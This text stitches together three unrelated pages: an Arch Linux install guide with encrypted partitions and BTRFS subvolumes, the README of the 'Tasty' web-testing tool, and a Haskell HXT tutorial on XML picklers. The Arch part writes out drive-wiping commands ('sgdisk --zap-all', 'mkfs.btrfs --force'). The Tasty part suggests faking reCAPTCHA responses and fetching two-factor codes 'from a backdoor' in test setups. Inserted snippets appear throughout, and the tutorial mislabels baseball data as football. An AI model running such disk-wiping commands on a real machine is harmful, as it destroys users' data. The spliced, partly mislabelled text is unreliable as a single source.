Please use the properties DATACITE_HOST, DATACITE_DOI_PATH and DATACITE_METADATA_PATH as mentioned above to connect to the test server, and change DATACITE_HOST to mds.datacite.org when you want to switch to the production server of DataCite (registering real DOIs).

DSpace should send updates to DataCite whenever the metadata of an item changes. To do so you have to change the dspace.cfg again. You should remove the comments in front of the two following properties or add them to the dspace.cfg:

event.consumer.doi.class = org.dspace.identifier.doi.DOIConsumer
event.consumer.doi.filters = Item+Modify_Metadata

Then you should add 'doi' to the property event.dispatcher.default.consumers. After adding it, this property may look like this:

event.dispatcher.default.consumers = versioning, discovery, eperson, harvester, doi

Command Line Interface
To make DSpace resistant to outages of DataCite, the DOI support is separated into two parts. When a DOI should be generated, reserved or minted, DSpace does this in its own database first. To perform registration and/or reservation against the DOI registration agency, a job has to be started using the command line. Obviously this should be done by a cron job periodically. In this section we describe the command line interface, in case you ever want to use it manually. In the next section you'll see the cron job that transfers all DOIs designated for reservation and/or registration.

The command line interface in general is documented here: Command Line Operations. The command used for DOIs is 'doi-organiser'. You can use the following options:

Currently you cannot generate new DOIs with this tool. You can only send information about changes in your local DSpace database to the registration agency.

'cron' job for asynchronous reservation/registration
When a DOI should be reserved, registered, deleted or its metadata updated, DSpace just writes this information into its local database. 
A command line interface is supplied to send the necessary information to the registration agency. This separation makes it easier to react to outages or errors of the API. The information should be sent regularly, so it is a good idea to set up a cron job instead of doing it manually. There are four commands that should be run regularly:

- Update the metadata of all items that have changed since their DOI was reserved.
- Reserve all DOIs marked for reservation.
- Register all DOIs marked for registration.
- Delete all DOIs marked for deletion.

In DSpace, a DOI can have the state "registered", "reserved", "to be reserved", "to be registered", "needs update", "to be deleted", or "deleted". After updating an item's metadata, the state of its assigned DOI is set back to the last state it had before. So, e.g., if a DOI has the state "to be registered" and the metadata of its item changes, it will be set to the state "needs update". After the update is performed, its state is set to "to be registered" again. Because of this behavior the order of the commands above matters: the update command must be executed before all of the other commands.

The cron job should perform the following commands with the rights of the user your DSpace installation runs as:

[dspace]/bin/dspace doi-organiser -u -q
[dspace]/bin/dspace doi-organiser -s -q
[dspace]/bin/dspace doi-organiser -r -q
[dspace]/bin/dspace doi-organiser -d -q

The doi-organiser sends error messages as email and logs some additional information. The option -q tells DSpace to be quiet. If you don't use this option, the doi-organiser will print a message to stdout for every DOI it successfully reserved, registered, updated or deleted; run from a cron job, these messages would be sent as email. In case of an error, consult the log messages. 
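The state behaviour described above (a metadata change parks the DOI in "needs update" and remembers the previous state, which is restored once the update has been transmitted) can be sketched in Python. This is an illustrative model, not DSpace code:

```python
# Illustrative sketch (not DSpace code) of the DOI state behaviour described
# above: a metadata change moves the DOI to "needs update" while remembering
# the previous state, which is restored after the update is transmitted.

class DoiRecord:
    def __init__(self, state="to be reserved"):
        self.state = state
        self._previous = None

    def metadata_changed(self):
        # Remember the last state before flagging the DOI for a metadata update.
        if self.state != "needs update":
            self._previous = self.state
            self.state = "needs update"

    def update_transmitted(self):
        # After `doi-organiser -u` succeeds, fall back to the remembered state.
        if self.state == "needs update":
            self.state = self._previous

doi = DoiRecord("to be registered")
doi.metadata_changed()
print(doi.state)          # needs update
doi.update_transmitted()
print(doi.state)          # to be registered
```

This also shows why the update command must run first: it returns each DOI to the state the other commands act on.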
If there is an outage of the API of your registration agency, DSpace will not change the state of the DOIs, so that the next time the cron job starts and the API is reachable again it will do everything necessary. How frequently the cron job should run depends on your needs and your hardware. The more often you run it, the faster your new DOIs will be available online. If you have a lot of submissions and want the DOIs to be available really quickly, you should probably run the cron job every fifteen minutes. If there are just one or two submissions per day, it should be enough to run the cron job twice a day.

To set up the cron job, run the following command as the dspace UNIX user:

crontab -e

The following line tells cron to run the necessary commands twice a day, at 1am and 1pm. Please note that the line starting with the numbers is one line, even if it is shown as multiple lines in your browser.

# Send information about new and changed DOIs to the DOI registration agency:
0 1,13 * * * [dspace]/bin/dspace doi-organiser -u -q ; [dspace]/bin/dspace doi-organiser -s -q ; [dspace]/bin/dspace doi-organiser -r -q ; [dspace]/bin/dspace doi-organiser -d -q

Limitations of DataCite DOI support
DSpace manages all of its DOIs under a single prefix and namespace separator. That means if you want to use other applications, or even more than one DSpace installation, to register DOIs with the same prefix, you'll have to use a unique namespace separator for each of them. Also, you should not manually generate DOIs with the same prefix and namespace separator you configured within DSpace. For example, if your prefix is 10.5072 you can configure one DSpace installation to generate DOIs starting with 10.5072/papers-, a second installation to generate DOIs starting with 10.5072/data-, and another application to generate DOIs starting with 10.5072/results-.

DSpace currently generates DOIs for items only. There is no support to generate DOIs for Communities and Collections yet. 
When using DSpace's support for the DataCite API, probably not all information will be restored when using AIP Backup and Restore (see DS-1836). The DOIs included in the metadata of items will be restored, but DSpace won't update the metadata of those items at DataCite anymore. You can even get problems when minting new DOIs after you have restored older ones using AIP.

Configure DSpace to use EZID service for registration of DOIs
The EZID IdentifierProvider operates synchronously, so there is much less to configure. You will need to un-comment the org.dspace.identifier.EZIDIdentifierProvider bean in config/spring/api/identifier-service.xml to enable DOI registration through EZID. In config/dspace.cfg you will find a small block of settings whose names begin with identifier.doi.ezid. You should uncomment these properties and give them appropriate values. Sample values for a test account are supplied.

Back in config/spring/api/identifier-service.xml you will see some other configuration of the EZIDIdentifierProvider bean. In most situations the default settings should work well, but here is an explanation of the available options:

- EZID Provider / Registrar settings: By default, the EZIDIdentifierProvider is configured to use the CDLib provider (ezid.cdlib.org) in the EZID_SCHEME, EZID_HOST and EZID_PATH settings. In most situations the default values should work for you. However, you may need to modify these values (especially EZID_HOST) if you are registered with a different EZID provider. In that situation, please check with your provider for valid "host" and "path" settings. If your provider provides EZID service at a particular path on its host, you may set that in EZID_PATH.
- NOTE: As of the writing of this documentation, the default CDLib provider settings should also work for institutions that use Purdue (ezid.lib.purdue.edu) as a provider. 
Purdue and CDLib currently share the same infrastructure, and both ezid.cdlib.org and ezid.lib.purdue.edu point to the same location.

- Metadata mappings: You can alter the mapping between DSpace and EZID metadata, should you choose. The crosswalk property is a map from DSpace metadata fields to EZID fields, and can be extended or changed. The key of each entry is the name of an EZID metadata field; the value is the name of the corresponding DSpace field, from which the EZID metadata will be populated.
- Crosswalking / Transforms: You can also supply transformations to be applied to field values using the crosswalkTransform property. Each key is the name of an EZID metadata field, and its value is the name of a Java class which will convert the value of the corresponding DSpace field to its EZID form. The only transformation currently provided is one which converts a date to the year of that date, named org.dspace.identifier.ezid.DateToYear. In the configuration as delivered, it is used to convert the date of issue to the year of publication. You may create new Java classes with which to supply other transformations, and map them to metadata fields here. If an EZID metadatum is not named in this map, the default mapping is applied: the string value of the DSpace field is copied verbatim.

Limitations of EZID DOI support
Currently, the EZIDIdentifierProvider has a known issue where it stores its DOIs in the dc.identifier field, instead of using the dc.identifier.uri field (which is the one used by DataCite DOIs and Handles). See DS-2199 for more details. This will be corrected in a future version of DSpace. DSpace currently generates DOIs for items only. There is no support to generate DOIs for Communities and Collections yet. 
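The DateToYear transform mentioned in the Crosswalking / Transforms bullet above reduces a date value to its year. As a rough illustration of what such a transform does (this Python sketch is not the shipped implementation, which is the Java class org.dspace.identifier.ezid.DateToYear):

```python
# Illustrative sketch of a DateToYear-style crosswalk transform. The date
# formats tried here are assumptions for the sake of the example.
from datetime import datetime

def date_to_year(value: str) -> str:
    """Reduce a date string such as '2013-01-23' to the year '2013'."""
    for fmt in ("%Y-%m-%d", "%Y-%m", "%Y"):
        try:
            return str(datetime.strptime(value, fmt).year)
        except ValueError:
            continue
    # Fall back to copying the value verbatim, mirroring the default mapping
    # applied to fields that have no transform.
    return value

print(date_to_year("2013-01-23"))  # 2013
```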
Adding support for other Registration Agencies
If you want DSpace to support other registration agencies, you just have to write a Java class that implements the interface DOIConnector ([dspace-source]/dspace-api/src/main/java/org/dspace/identifier/doi/DOIConnector.java). You might use the DataCiteConnector ([dspace-source]/dspace-api/src/main/java/org/dspace/identifier/doi/DataCiteConnector.java) as an example. After developing your own DOIConnector, configure DSpace as if you were using the DataCite API directly; just use your DOIConnector when configuring the IdentifierService instead of the DataCiteConnector.

1 Comment
Andrea Schweer
There is an open ticket for improving this documentation: DS-2671; see the comments on that issue for some additional documentation, in particular with regard to item states / terminology.
https://wiki.duraspace.org/display/DSDOC5x/DOI+Digital+Object+Identifier
CC-MAIN-2017-17
refinedweb
2,902
55.54
Hi,

I have created a class which I use to create several lists of different values. I am then going through all the lists to count the frequency of the values. The problem is I want to consider, say, value1 = 1, value2 = 2, value3 = 3 to be the same as value1 = 2, value2 = 1, value3 = 3, and so on.

The way I am currently doing it is with a series of if statements which look at the possibilities, so for my class called Pair (below) I would swap the values around to see if they match. With a three-value number I would have 5 possibilities, and so on. I am just curious: is there a faster way of seeing if the values match as I want them to, without going through a number of if statements?

public class MyDictionaryPair : Dictionary<int, Pair>
{
    public void Add(int key, int value1, int value2,
                    decimal weight1, decimal weight2, decimal totalWeight)
    {
        Pair val;
        val.Value1 = value1;
        val.Weight1 = weight1;
        val.Value2 = value2;
        val.Weight2 = weight2;
        val.TotalWeight = totalWeight;
        this.Add(key, val);
    }
}

Kind Regards
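The permutation test described in the post can be done without enumerating cases by comparing a canonical (sorted) form of the value sets. This sketch of the idea is in Python and is not part of the original thread (the poster's code is C#), but the same approach applies:

```python
# Two value tuples count as equal if one is a permutation of the other.
# Sorting gives a canonical form, so no chain of if-statements over the
# permutations is needed, regardless of how many values there are.
def same_values(a, b):
    return sorted(a) == sorted(b)

print(same_values((1, 2, 3), (2, 1, 3)))  # True
print(same_values((1, 2, 3), (1, 2, 4)))  # False
```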
https://www.daniweb.com/programming/software-development/threads/500054/matching-numbers
CC-MAIN-2018-43
refinedweb
183
66.44
matplotlib.cbook.ls_mapper, added ls_mapper_r
Formerly, matplotlib.cbook.ls_mapper was a dictionary with the long-form line-style names ("solid") as keys and the short forms ("-") as values. This long-to-short mapping is now done by ls_mapper_r, and the short-to-long mapping is done by ls_mapper.

This was done to prevent an Artist that is already associated with an Axes from being moved/added to a different Axes. This was never supported, as it causes havoc with the transform stack. The apparent support for this (as it did not raise an exception) was the source of multiple bug reports and questions on SO. For almost all use cases, the assignment of the axes to an artist should be taken care of by the axes as part of the Axes.add_* methods, hence the deprecation of {get,set}_axes. Removing the set_axes method will also remove the 'axes' line from the ACCEPTS kwarg tables (assuming that the removal date gets here before that gets overhauled).

Tightened validation so that only {'tip', 'tail', 'mid', and 'middle'} (in any capitalization) are valid values for the 'pivot' kwarg in Quiver.__init__ (and hence Axes.quiver and plt.quiver, which both fully delegate to Quiver). Previously any input matching 'mid.*' would be interpreted as 'middle', 'tip.*' as 'tip', and any string not matching one of those patterns as 'tail'. The value of Quiver.pivot is normalized to be in the set {'tip', 'tail', 'middle'} in Quiver.__init__.

Axes.get_children
The artist order returned by Axes.get_children did not match the one used by Axes.draw. They now use the same order, as Axes.draw now calls Axes.get_children.

The default behaviour of contour() and contourf() when using a masked array is now determined by the new keyword argument corner_mask, or, if this is not specified, by the new rcParam contour.corner_mask instead. The new default behaviour is equivalent to using corner_mask=True; the previous behaviour can be obtained using corner_mask=False or by changing the rcParam. 
The example demonstrates the difference. Use of the old contouring algorithm, which is obtained with corner_mask='legacy', is now deprecated. Contour labels may now appear in different places than in earlier versions of Matplotlib. In addition, the keyword argument nchunk now applies to contour() as well as contourf(), and it subdivides the domain into subdomains of exactly nchunk by nchunk quads, whereas previously it was only roughly nchunk by nchunk quads. The C/C++ object that performs contour calculations used to be stored in the public attribute QuadContourSet.Cntr, but is now stored in a private attribute and should not be accessed by end users.

This was a bug fix targeted at making the API for Locators more consistent. In the old behavior, only locators of type MaxNLocator had set_params() defined, causing its use on any other Locator to raise an AttributeError. (Aside: set_params(args) is a function that sets the parameters of a Locator instance to those specified in args.) The fix involves moving set_params() to the Locator class, so that all subtypes have this function defined. Since each of the Locator subtypes has its own modifiable parameters, a universal set_params() in Locator isn't ideal. Instead, a default no-operation function that raises a warning is implemented in Locator. Subtypes extending Locator then override it with their own implementations. Subtypes that have no need for set_params() fall back onto their parent's implementation, which raises a warning as intended. In the new behavior, Locator instances will not raise an AttributeError when set_params() is called. For Locators that do not implement set_params(), the default implementation in Locator is used.

None as x or y value in ax.plot
Do not allow None as a valid input for the x or y args in ax.plot. 
This may break some user code, but this was never officially supported (i.e., documented), and allowing None objects through can lead to confusing exceptions downstream. To create an empty line use

ln1, = ax.plot([], [], ...)
ln2, = ax.plot([], ...)

In either case, to update the data in the Line2D object you must update both the x and y data.

args and kwargs from MicrosecondLocator.__call__
The call signature of __call__() has changed from __call__(self, *args, **kwargs) to __call__(self). This is consistent with the superclass Locator and also with all the other Locators derived from that superclass.

ValueError for the MicrosecondLocator and YearLocator
The MicrosecondLocator and YearLocator objects, when called, will return an empty list if the axes have no data or the view has no interval. Previously, they raised a ValueError. This is consistent with all the other Date Locators.

The call signature was OffsetBox.DrawingArea(..., clip=True), but nothing was done with the clip argument. The object did not do any clipping regardless of that parameter. Now the object can and does clip the child Artists if they are set to be clipped. You can turn off the clipping on a per-child basis using child.set_clip_on(False).

Add salt to the hash used to determine the id of the clipPath nodes. This is to avoid conflicts when two svg documents with the same clip path are included in the same document (see and ); however, this means that the svg output is no longer deterministic if the same figure is saved twice. It is not expected that this will affect any users, as the current ids are generated from an md5 hash of properties of the clip path, and any user would have a very difficult time anticipating the value of the id.

When drawing circle markers above some marker size (previously 6.0), the path used to generate the marker was snapped to pixel centers. However, this ends up distorting the marker away from a circle. By setting the snap threshold to inf, snapping is never done on circles. 
This change broke several tests, but is an improvement. Previously the get_position method on Text would strip away unit information even though the units were still present. There was no inherent need to do this, so it has been changed so that unit data (if present) will be preserved. Essentially, a call to get_position will return the exact value from a call to set_position. If you wish to get the old behaviour, you can use the new method get_unitless_position.

Interactive pan and zoom were previously implemented using a Cartesian-specific algorithm that was not necessarily applicable to custom Axes. Three new private methods, _get_view(), _set_view(), and _set_view_from_bbox(), allow custom Axes classes to override the pan and zoom algorithms. Implementors of custom Axes who override these methods may provide suitable behaviour for both pan and zoom as well as the view navigation buttons on the interactive toolbars.

The spacing commands in mathtext have been changed to more closely match vanilla TeX. The extra space that appeared after subscripts and superscripts has been removed.

In #2351 for 1.4.0, the behavior of ['axes points', 'axes pixel', 'figure points', 'figure pixel'] as coordinates was changed to no longer wrap for negative values. In 1.4.3 this change was reverted for 'axes points' and 'axes pixel', and in addition caused 'axes fraction' to wrap. For 1.5 the behavior has been reverted to what it was in 1.4.0-1.4.2: no wrapping for any type of coordinate.

GraphicsContextBase.set_graylevel
The GraphicsContextBase.set_graylevel function has been deprecated in 1.5 and will be removed in 1.6. It has been unused. GraphicsContextBase.set_foreground can be used instead.

The idle_event was broken or missing in most backends and caused spurious warnings in some cases, and its use in creating animations is now obsolete due to the animations module. 
Therefore code involving it has been removed from all but the wx backend (where it partially works), and its use is deprecated. The animations module may be used instead to create animations.

color_cycle deprecated
In light of the new property cycling feature, the Axes method set_color_cycle is now deprecated. Calling this method will replace the current property cycle with one that cycles just the given colors. Similarly, the rc parameter axes.color_cycle is also deprecated in lieu of the new axes.prop_cycle parameter. Having both parameters in the same rc file is not recommended, as the result cannot be predicted. For compatibility, setting axes.color_cycle will replace the cycler in axes.prop_cycle with a color cycle. Accessing axes.color_cycle will return just the color portion of the property cycle, if it exists. A timeline for removal has not been set.

The version of jquery bundled with the webagg backend has been upgraded from 1.7.1 to 1.11.3. If you are using the version of jquery bundled with webagg, you will need to update your html files as follows:

- <script src="_static/jquery/js/jquery-1.7.1.min.js"></script>
+ <script src="_static/jquery/js/jquery-1.11.3.min.js"></script>

Image from main namespace
Image was imported from PIL/pillow to test whether PIL is available, but there is no reason to keep Image in the namespace once the availability has been determined.

lod from Artist
Removed the method set_lod and all references to the attribute _lod, as they are not used anywhere else in the code base. It appears to be a feature stub that was never built out.

Lena images from sample_data
The lena.png and lena.jpg images have been removed from Matplotlib's sample_data directory. The images are also no longer available from matplotlib.cbook.get_sample_data. We suggest using matplotlib.cbook.get_sample_data('grace_hopper.png') or matplotlib.cbook.get_sample_data('grace_hopper.jpg') instead.

Remove code to allow legend handlers to be callable. 
They must now implement a method legend_artist. Removed method set_scale. This is now handled via a private method which should not be used directly by users. It is called via Axes.set_{x,y}scale which takes care of ensuring the related changes are also made to the Axes object. Both ipython_console_highlighting and ipython_directive have been moved to IPython. Change your import from 'matplotlib.sphinxext.ipython_directive' to 'IPython.sphinxext.ipython_directive' and from 'matplotlib.sphinxext.ipython_directive' to 'IPython.sphinxext.ipython_directive' 'faceted'as a valid value for shadingin tri.tripcolor¶ Use edgecolor instead. Added validation on shading to only be valid values. facetedkwarg from scatter¶ Remove support for the faceted kwarg. This was deprecated in d48b34288e9651ff95c3b8a071ef5ac5cf50bae7 (2008-04-18!) and replaced by edgecolor. set_colorbarmethod from ScalarMappable¶ Remove set_colorbar method, use colorbar attribute directly. - remove get_proxy_renderermethod from AbstarctPathEffectclass - remove patch_alphaand offset_xyfrom SimplePatchShadow
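The property-cycle change above can be illustrated with a short sketch. This is not from the changelog itself; it assumes matplotlib 1.5+ with the cycler package (a matplotlib dependency) and uses the non-interactive Agg backend:

```python
import matplotlib
matplotlib.use("Agg")  # non-interactive backend; nothing is displayed

import matplotlib.pyplot as plt
from cycler import cycler

fig, ax = plt.subplots()

# Deprecated in 1.5: ax.set_color_cycle(['r', 'g', 'b'])
# Replacement: a full property cycle (here, colors only)
ax.set_prop_cycle(cycler(color=['r', 'g', 'b']))

for i in range(3):
    ax.plot([0, 1], [i, i + 1])

# Each line picked up the next entry of the property cycle
print([line.get_color() for line in ax.get_lines()])
```

The cycler API also lets you cycle other properties (linestyle, linewidth, etc.) together with color, which is what set_color_cycle could never do.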
https://matplotlib.org/api/prev_api_changes/api_changes_1.5.0.html
CodeGuru Forums > Visual C++ & C++ Programming > C++ (Non Visual C++ Issues) > Reading from a file including null character

Kohinoor24
February 1st, 2002, 05:32 AM

I have some contents in one file and I am reading them into another file, but it stops reading when it encounters the null character. Is there any other function which reads the entire file even if the file contains a null? I want to read the entire file. I have the following code:

const char cCc = {'\x5A'};
const char Length[] = {'\x00','\x00'};
const char IDM[] = {'\xD3','\xAB','\xCA','\x00','\x00','\x00'};

// A class
class C_ptx
{
public:
    C_ptx()
    {
        m_ptx.open("First", ios::out | ios::binary);
    }
    void Createstream()
    {
        m_ptx.write(&cCc, sizeof(cCc));
        m_ptx.write(Length, sizeof(Length));
        m_ptx.write(IDM, sizeof(IDM));
    }
    ofstream& returnstream()
    {
        return m_ptx;
    }
private:
    ofstream m_ptx;
}; // class ends here

// Main function
void main()
{
    C_ptx T1;
    T1.Createstream();
    ofstream& s1 = T1.returnstream();
    if (!s1.eof())
    {
        s1.seekp(0, ios::end);
    }
    int s = s1.tellp();
    char* buffer = new char[s];
    ifstream r1("First", ios::in | ios::binary);
    // Here, when I am reading from the "First" file, it stops reading when it
    // encounters the null character. Is there any other function which reads
    // the entire file even if the file contains a null?
    r1.getline(buffer, s);
    ofstream m_mixeddata("second", ios::out | ios::binary);
    m_mixeddata.write(buffer, sizeof(buffer));
}

Kohinoor

NMTop40
February 1st, 2002, 07:45 AM

A few things:

1. I think a stream opened for output only is always at eof. I'm not sure you can do seek on it. For that you have to open for write and read.
2. You have not closed your stream before you try to read the same file for input. Although the stream logically knows all the data, it may have buffered some, so physically the file either won't open at all or may be incomplete or even empty.
3. You are using text reading functions (getline) for a binary file.
You should know, by the way, that the standard streaming functions are all text, although you can write your own for your own classes that output / input binary. All ios::binary does is not convert line endings. (It's annoying because I also thought ios::binary should cause a 4-byte integer to be streamed with 4 bytes.)

4. To read from a binary file you may want to use the read() member of istream, and to write you may want to use write().
5. You might want to use the flashy istreambuf_iterator< >. This would be done as follows (but doesn't work on Windows for some unknown reason):

#include <iterator>
#include <fstream>
#include <vector>
using namespace std; // for illustration convenience

ifstream& ifs = getStream(); // (open stream we have somewhere)
istreambuf_iterator<char> ifStart( ifs );
istreambuf_iterator<char> ifEnd;
vector<char> buffer( ifStart, ifEnd );

If you want to read binary integers, just change <char> to <int> throughout. This workaround that Scott Meyers gives doesn't work for me on Windows either:

vector<char> buffer;
buffer.reserve( distance( ifStart, ifEnd ) ); // works fine
copy( ifStart, ifEnd, back_inserter(buffer) ); // for me this copies nothing

(Anyone know if Dinkumware has bug-fixes for this?)

The best things come to those who rate

NMTop40
February 1st, 2002, 08:19 AM

OK, this worked:

ifs.seekg( 0, ios_base::beg );

after the distance() call, but only with the copy function. An alternative is not to reserve. That means more reallocations but means it doesn't have to move the file pointer as much. You can only do this to read the whole file. If you want to read part of the file, use resize() then read(), not copy and back_inserter. (Probably better anyway.)

The best things come to those who rate

Kohinoor24
February 4th, 2002, 01:57 AM

I have closed the file as you suggested, and instead of the getline function I used the read function. How can I integrate the flashy iterator code into my code?
This is a very important part of the code for me, as I have to read all data from one file to another even if it contains spaces. I don't know why it is reading only up to the characters preceding the space in the file.

Kohinoor

NMTop40
February 4th, 2002, 06:36 AM

My code showed you how to load all the contents of a file into memory as a raw vector of chars. Files have structure - now what you need to do is interpret the structure of the file into a class structure. istreambuf_iterator does not skip over whitespace characters (it doesn't interpret them as terminators).

I do have to say though that I find BSTR a much nicer format to work with for file I/O. It doesn't rely on terminators/separators. If you are working on UNIX you can write your own BSTR-based class to work with for file I/O. (You can do so if working on Windows too and don't want to use ATL, or want to work with 1-byte characters; BSTR is based on Unicode.)

A BSTR (in COM) is a 4-byte length (binary) followed by the string. The length is the number of characters that follow, not the number of bytes (which is twice as many); thus the length in bytes is actually 2n+4. Of course, this would make your files not readable or editable in a text editor. Depends on whether you consider this a good thing or a bad thing.

The best things come to those who rate

NMTop40
February 4th, 2002, 08:09 AM

Actually, a BSTR does contain a terminating null character as well, but there can also be embedded nulls. The terminating null is not counted in its length but is always there. However, the provided functions of CComBSTR (WriteToStream and ReadFromStream) do not persist these null terminators. You can cast to LPCWSTR, but obviously this will go only to the first null; you can also create a wstring from one easily enough, as it takes a pointer and a length in one of its constructors. CComBSTR already wraps the class, and although it is not documented it has an operator LPCWSTR which returns the address of the first character if not NULL, and NULL otherwise.

The best things come to those who rate

manojvibhute
September 3rd, 2002, 08:15 AM

I think the end result wanted is an exact copy of the file, including white space and everything. So better to use the copyfile function to make its copy.
http://forums.codeguru.com/archive/index.php/t-180579.html
User:Altercation/Bullet Proof Arch Install

This page is a summary of the current process I follow when installing Arch on a new laptop or desktop. My process varies over time, but this serves as my "state of the art" best practice recommendations. I'm open to feedback and suggestions for improvements.

Contents

- 1 Objectives
- 2 Assumptions
- 3 Prerequisites
- 4 Preparation
- 5 Partition & Format Drive
  - 5.1 Understanding some basics about disks, partitions, and filesystems
  - 5.2 Our partition plans
  - 5.3 Partition Summary
  - 5.4 Visual overview of our partitions, filesystems, and contents
  - 5.5 Partition Drive
  - 5.6 Format EFI Partition
  - 5.7 Encrypt System Partition
  - 5.8 Bring Up Encrypted Swap
  - 5.9 Create and mount BTRFS subvolumes
  - 5.10 Mount EFI partition
- 6 Installation of Base Arch Linux System
  - 6.1 Install base package group
  - 6.2 fstab Generation and Modification
  - 6.3 Boot into new system
  - 6.4 Generate and set locale
  - 6.5 Time and Date
  - 6.6 Set hostname
  - 6.7 Network configuration
  - 6.8 Base Package Installation
  - 6.9 Initramfs
  - 6.10 Bootloader
  - 6.11 Root password
  - 6.12 Leave the systemd-nspawn environment
  - 6.13 Legacy boot loader
- 7 Command Summary
- 8 Quick and Dirty

Objectives

The goals of my standard "bullet proof" Arch Linux installation are:

- Benefit from Arch's rolling release model while mitigating any risk of system corruption or data loss due to failed upgrades
- Minimize risk due to hardware failure or total system loss (e.g. theft or physical destruction)
- Make system rollbacks easy and procedural, using a standard setup and methodology for recovery of previous system (and user data) states

Why not the Arch Install instructions?

The Arch Linux installation instructions are an excellent, general starting point and you should read and understand them. That being said, they are designed to map to a very, very broad set of installation scenarios.
I am interested in a very specific type of installation (daily use desktops and laptops in this article) and I have a strong set of opinions about the "right" or "best practice" way to set up my own working systems. These instructions, then, are much more prescriptive and have strong suggestions or directions about how (and why) one should use a particular method during Arch Linux installation.

Key differences from the stock Arch install instructions

How these instructions differ from the standard Arch guidance:

- We are encrypting the entire system but not using LVM as is often recommended (see the encryption section below for details about why we are not using it).
- I use labels and avoid UUIDs where possible to make switching to an alternate recovery drive easier.
- I skip arch-chroot and simply boot the new system (not reboot, just boot) from within the install environment using systemd-nspawn(1), which enables the *ctl commands to work (and systemd services to be enabled properly without need for a system reboot).
- I use the various systemd *ctl commands (hostnamectl, timedatectl, localectl, etc.) to configure the system.
- I use the systemd mkinitcpio hooks in lieu of the legacy hooks.
- I use BTRFS exclusively for root and home partitions for its backup capabilities.
- I recommend and use secure boot (but not with the Microsoft keys) to minimize risk due to the unavoidably unencrypted EFI partition.

Assumptions

These instructions presuppose the following:

- fairly new hardware (these instructions may work on older hardware, but there may be unusual issues that crop up... if you aren't comfortable handling those situations you should consider a more "traditional" Arch Linux install, e.g. using grub, LVM, ext4, etc.)
- UEFI support (BIOS system install is also possible with some modification of these instructions, but this has not yet been detailed here)
- probably an SSD.
- some familiarity with Arch, or at least some experience with Linux, will help

Prerequisites

You must have a recent copy of the Arch install USB. See Category:Getting and installing Arch for general information and USB flash installation media for specific details on creating a USB Arch installation drive.

You should also have a reasonable amount of time in which to complete the installation. Novice users will want to budget a couple hours. Experienced users will know to budget a couple hours.

Preparation

Boot from USB Drive

Boot your system from your prepared Arch Linux USB drive. It is important that you boot in EFI mode, not legacy BIOS compatibility mode. See the UEFI article for more information about checking boot mode and ensuring you are booting using EFI.

Bring up the network

If you booted into a system with an ethernet cable plugged in, chances are you're up and running. If you need to use wireless instead, wifi-menu will more often than not work without trouble. If those don't work, see the Arch installation guide section on connecting to the internet.

Select Drive

I like to use the lsblk command to bring up a quick list of the block devices on the system and identify existing partition structures and sizes, as well as mount points. If you don't already use it, I recommend lsblk when you need information on any given drive or partition. It's useful for polling UUIDs as well. For example, the following command gives you a clearly formatted summary of all block devices, their partition labels, filesystem labels, UUIDs and partition UUIDs:

lsblk -o +LABEL,PARTLABEL,UUID,PARTUUID

In any case, the plain command without options should be enough to identify the drive you will install to (for example /dev/sda or /dev/nvme0n1):

# lsblk

Wipe Drive Securely (optional)

While it is not necessary, given that this process will go through the trouble of encrypting the main system partition, it makes sense to do a secure wipe of the drive.
This is more or less directly from Dm-crypt/Drive preparation#dm-crypt wipe on an empty disk or partition.

First, create a temporary encrypted container on the full disk (sdX) to be encrypted, e.g. using default encryption parameters and a random key via the --key-file /dev/{u}random option (see also Random number generation):

# cryptsetup open --type plain /dev/sdX container --key-file /dev/urandom

Second, check that the container exists:

# fdisk -l
Disk /dev/mapper/container: XXXX MB, XXXXXXXXXX bytes
...
Disk /dev/mapper/container does not contain a valid partition table

Wipe the container with zeros. A use of if=/dev/urandom is not required, as the encryption cipher itself generates randomness.

# dd if=/dev/zero of=/dev/mapper/container status=progress bs=1M
dd: writing to '/dev/mapper/container': No space left on device

- Using dd with the bs= option, e.g. bs=1M as above, speeds up the wipe considerably.
- Afterwards, od can be used to spot-check that the wipe overwrote the sectors, e.g. by passing od -j an offset near the end of the container (the container size minus one block size) to verify the wipe completed to the end.

Finally, close the temporary container:

# cryptsetup close container

Partition & Format Drive

Understanding some basics about disks, partitions, and filesystems

Think of your drive like a big empty building, no rooms. This is your plain physical drive (either a spinning platter drive or an SSD). Next imagine that to make it useful, we divide the building into apartments. In our analogy the apartments are partitions of the drive. Imagine also that there are a couple different standard methods of creating layout maps to the apartments. These plans are standardized so that the public services that have to access the building regularly (like the fire and police, for example) understand how to find the apartment entrances. In the world of partitioning, the equivalent is the "partition table scheme". The two common schemes are called "MBR" (Master Boot Record, older) and "GPT" (GUID Partition Table, newer). We will be using the new GPT scheme.
Finally, imagine that the apartments are just empty shells. The act of building walls and laying out the functional structure of the apartments is equivalent to formatting our disk partitions with a filesystem. And just as different layouts may be more or less efficient, or have other different functional characteristics, so too filesystems have different attributes that make them useful in different ways.

Our partition plans

We will take our physical drive and divide it into three partitions. These partitions each serve a distinct purpose. All but the first and smallest, the EFI partition, will be encrypted. For security, if your system supports Secure Boot, you may choose to cryptographically sign the data stored on the EFI partition so that any tampering will be evident, despite the lack of encryption on that partition.

We will not be using LVM. You read a lot about LUKS and LVM and it all gets a bit complicated (LVM on LUKS, LUKS on LVM, etc.). LVM is a "logical volume manager" and abstracts physical devices (drives) into virtual devices, for easier management. It's a good idea, but we will be using btrfs to effectively achieve the same results and really don't need the overhead of LVM.

Partition Summary

- 1: EFI - The UEFI "bios" will look for this FAT32 formatted partition and either locate a default bootloader or will locate a specific EFI boot entry on it. This partition is by necessity not encrypted (unless the drive it is on has been encrypted as a "self encrypting drive").
- 2: Swap - Used by Linux to swap out pages of memory from RAM to disk. Despite debate in this area, it is advisable to have at least some swap space, even if you are not planning on using hibernation on your machine. The Arch wiki is unfortunately rather too brief in its own swap article, so I recommend the Fedora documentation on swap for a good overview on determining the right swap partition size.
- 3: System - This will hold our root and home data.
It will be formatted as BTRFS and will use subvolumes to manage snapshots of the current root and home contents.

Visual overview of our partitions, filesystems, and contents

This is a visual summary of our partitions (incl. size information), encryption, filesystems, and a summary of the contents of each container.

Partition Drive

There are many utilities available for partitioning. Because we are using Arch Linux and the command line doesn't hurt us (it makes us stronger), we will be using pure, non-interactive command line tools for this. Specifically, we will be using the utility sgdisk from the gptfdisk package. The fdisk utility now also supports GPT partitioned drives, so it would be an alternative. sgdisk is available by default on the standard Arch install iso that you use to make your bootable USB drive.

First, select the drive you will install to. Make sure you have selected the correct drive! Again, a quick lsblk will work here.

# DRIVE=/dev/DRIVEID

(replace /dev/DRIVEID with the correct value, for example /dev/sda, /dev/nvme0n1, etc.)

